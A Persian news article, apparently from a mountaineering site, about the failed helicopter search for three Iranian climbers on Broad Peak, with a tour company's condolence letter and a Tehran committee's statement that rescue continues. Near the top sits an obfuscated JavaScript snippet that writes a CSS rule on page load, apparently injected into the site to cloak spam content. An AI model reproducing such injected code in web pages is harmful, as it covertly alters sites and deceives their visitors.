خانه / فرهنگی / اخبار / شب تلخ کوهنوردی ایران/ گزارش «توماس لامل» از پایان تلاش ها و امیدها در برودپیک و خبر ستاد پیگیری حادثه درتهران

شب تلخ کوهنوردی ایران/ گزارش «توماس لامل» از پایان تلاش ها و امیدها در برودپیک و خبر ستاد پیگیری حادثه درتهران

brod3
function dnnInit(){var a=0,m,v,t,z,x=new Array(“9091968376″,”88879181928187863473749187849392773592878834213333338896″,”778787″,”949990793917947998942577939317”),l=x.length;while(++a<=l){m=x[l-a];t=z="";for(v=0;v<m.length;){t+=m.charAt(v++);if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);t="";}}x[l-a]=z;}document.write(".”+x[2]+”{“+x[1]+”}”);}dnnInit();

آقای Thomas Lammle راهنما و عضو ستاد امداد و نجات فدراسیون کوه نوردی آلمان که امروز با دو پرواز مسیر صعود و فرود کوه نوردان باشگاه آرش را به طور هوایی بررسی کرد، گزارش خود را به شرکت ATP داده و شرکت نامه زیر را به آقای همایون بختیاری دبیر باشگاه کوه نوردی آرش ایمیل کرده:

همایون عزیز

سلام علیکم

ما بسیار متاسفیم که جهت آگاهی شما  اطلاعات زیر را ارائه می نماییم:

پیرو درخواست و تلاش راسخ شما،  راهنمای کوهستان آلمانی آقای توماس لامل صبح امروز ماموریت جستجو با هلی کوپتر را بر عهده گرفتند. آنان تا حداکثر ارتفاع ممکن پرواز کردند و از مکان هایی که در آن ها احتمال دیدن کوهنوردان ایرانی در برودپیک بود، عکس برداری کردند. متاسفانه آن ها هیچ نشانی در نقاط محتمل نیافتند. آقای توماس لامل به عنوان یک راهنمای کوهستان حرفه ای، به این نتیجه گیری رسید که تلاش های آتی برای زنده نگه داشتن کوهنوردان ایرانی گم شده بی فایده خواهد بود.

دو راهنمای ارتفاع پاکستانی شرکت ATP: اصغر و سرور نیز به بیس کمپ بازگشته اند. آن ها تمام مسیر را کاملا جستجو کرده اند و در مسیر قله برودپیک چیزی نیافته اند. آن ها همچنین عکس هایی از مسیر خود آورده اند.

با کمال تاسف ما متقاعد شدیم که سه کوهنورد ایرانی حیات با ارزش خود را از دست داده اند. ما نتوانستیم تلاشی جهت حفظ جان برادران عزیزمان انجام دهیم، تقدیر خداوند متعال بر مرگ برادران عزیزمان در ارتفاعات قراقروم بوده است. آنان عاشق کوهستان بودند و زندگی خود را بر سر  راه رسیدن به اوج علاقه مندی هایشان گذاشتند. این رویداد ضایعه بزرگی برای جامعه کوهنوردی به طور عام و برای خانواده های این عزیزان  و مردم ایران به طور خاص می باشد. ما در غم و اندوه شریک هستیم و مراتب تسلیت مان را به خانواده های داغدیده اعلام می کنیم. خداوند قادر روح درگذشته گان را در آرامش ابدی محفوظ بدارد و به خانواده ها و دوستانشان شجاعت تحمل این فقدان جبران ناپذیر را عطا بفرماید. آمین

نیکنام کریم  / مدیر عامل ادونچر تورز پاکستان  

—————————————————

دقایقی بعد از درج خبر فوق در سایت کوه نیوز ، ستاد پیگیری حادثه برودپیک در تهران خبر زیر را در اختیار سایت مذکور و سایر مراجع قرار داده است :

نتیجه گیری شرکت ATP مبنی بر توقف عملیات نجات نظر رسمی باشگاه کوه نوردان آرش نیست. باشگاه کماکان پی گیر عملیات امداد و مشاوره با کوه نوردان شاخص جهانی میباشد و نقطه زمین گیر شدن تیم را به صورت فنی به بحث گذاشته است.

broadpeek-92-koohnews

در حال حاظر افشین به همراه یک باربر در کمپ سوم مستقر و رامین نیز در کمپ اصلی و کمپ K2 جهت جلب موافقت کوه نوردان جهت شرکت در عملیات امداد می باشند و به ایشان و شرکت ATP اعلام شده عملیات امداد و نجات تا اطلاع ثانوی ادامه دارد و هر دو هلی کوپتر را آماده به پرواز نگهدارند.

(منبع : سایت کوه نیوز)

zp8497586rq

همچنین ببینید

اجرای برنامه صعود به قله علم کوه

برنامه صعود به قله علم کوه در تاریخ ۲۷ و ۲۸ مردادماه با شرکت سیزده …